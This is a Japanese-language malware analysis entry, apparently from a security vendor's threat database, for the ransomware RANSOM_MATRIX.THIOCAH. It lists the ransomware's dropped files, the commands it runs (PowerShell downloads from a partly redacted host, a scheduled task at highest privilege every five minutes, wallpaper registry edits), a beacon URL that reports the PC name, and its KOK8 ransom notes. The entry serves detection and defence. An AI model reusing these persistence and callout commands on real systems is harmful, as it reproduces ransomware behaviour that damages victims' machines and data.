RANSOM_MATRIX.THIOCAH

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

ただし、情報公開日現在、このWebサイトにはアクセスできません。

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、感染したコンピュータ内に以下として自身のコピーを作成し、実行します。

• %System Root%\{Malware Path}\{Random Filename}.exe

(註：%System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)

マルウェアは、以下のファイルを作成します。

• %System Root%\{Malware Path}\{Random numbers}_log.txt
• %System Root%\{Malware Path}\bad_{Random Characters}.txt
• %System Root%\{Malware Path}\elog_{Random Characters}.txt
• %System Root%\{Malware Path}\LFIN_{Random Characters}.txt
• %System Root%\{Malware Path}\{Random Filename}.bat
• %Application Data%\{Random Filename}.bat
• %Application Data%\{Random Filename}.vbs

(註：%System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。)

マルウェアは、以下のプロセスを追加します。

• cmd.exe /C copy /V /Y "%System Root%\{Malware Path}\1.exe" "%System Root%\{Malware Path}\{Random Filename}.exe
• cmd.exe /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://{BLOCKED}nalip.com/raw')">"%System Root%\{Malware Path}\{Random Filename}txt"
• powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://{BLOCKED}nalip.com/raw')"
• cmd.exe /C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "%Application Data%\{Random Filename}}.bmp" /f & reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
• cmd.exe reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "%Application Data%\{Random Filename}.bmp" /f
• cmd.exe reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
• cmd.exe reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
• cmd.exe wscript //B //Nologo "%Application Data%\{Random Filename}.vbs"
• cmd.exe schtasks /Create /tn DSHCA /tr "%Application Data%\{Random Filename}.bat" /sc minute /mo 5 /RL HIGHEST /F
• cmd.exe schtasks /Run /I /tn DSHCA

他のシステム変更

マルウェアは、以下のレジストリ値を変更し、デスクトップの壁紙を変更します。

HKEY_CURRENT_USER\Control Panel\Desktop
Wallpaper = "%Application Data%\{Random Filename}.bmp"

HKEY_CURRENT_USER\Control Panel\Desktop
TileWallpaper = "0"

HKEY_CURRENT_USER\Control Panel\Desktop
WallpaperStyle = "0"

その他

マルウェアは、以下のWebサイトにアクセスしてインターネット接続を確認します。

• http://{BLOCKED}nalip.com/raw

マルウェアは、以下の不正なWebサイトにアクセスします。

• http://{BLOCKED}at.{BLOCKED}tapp.com/addrecord.php?apikey=kok8_api_key&compuser={PC NAME}&sid=9wJqcF9Oob8McJkB&phase=START

ただし、情報公開日現在、このWebサイトにはアクセスできません。

ランサムウェアの不正活動

マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。

• [{BLOCKED}8@{BLOCKED}ail.com ].{Random Filename}.KOK8

マルウェアが作成する以下のファイルは、脅迫状です。

• %Application Data%\{Random Filename}.bmp
• {Encrypted Folder}\#KOK8_README#.rtf

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。)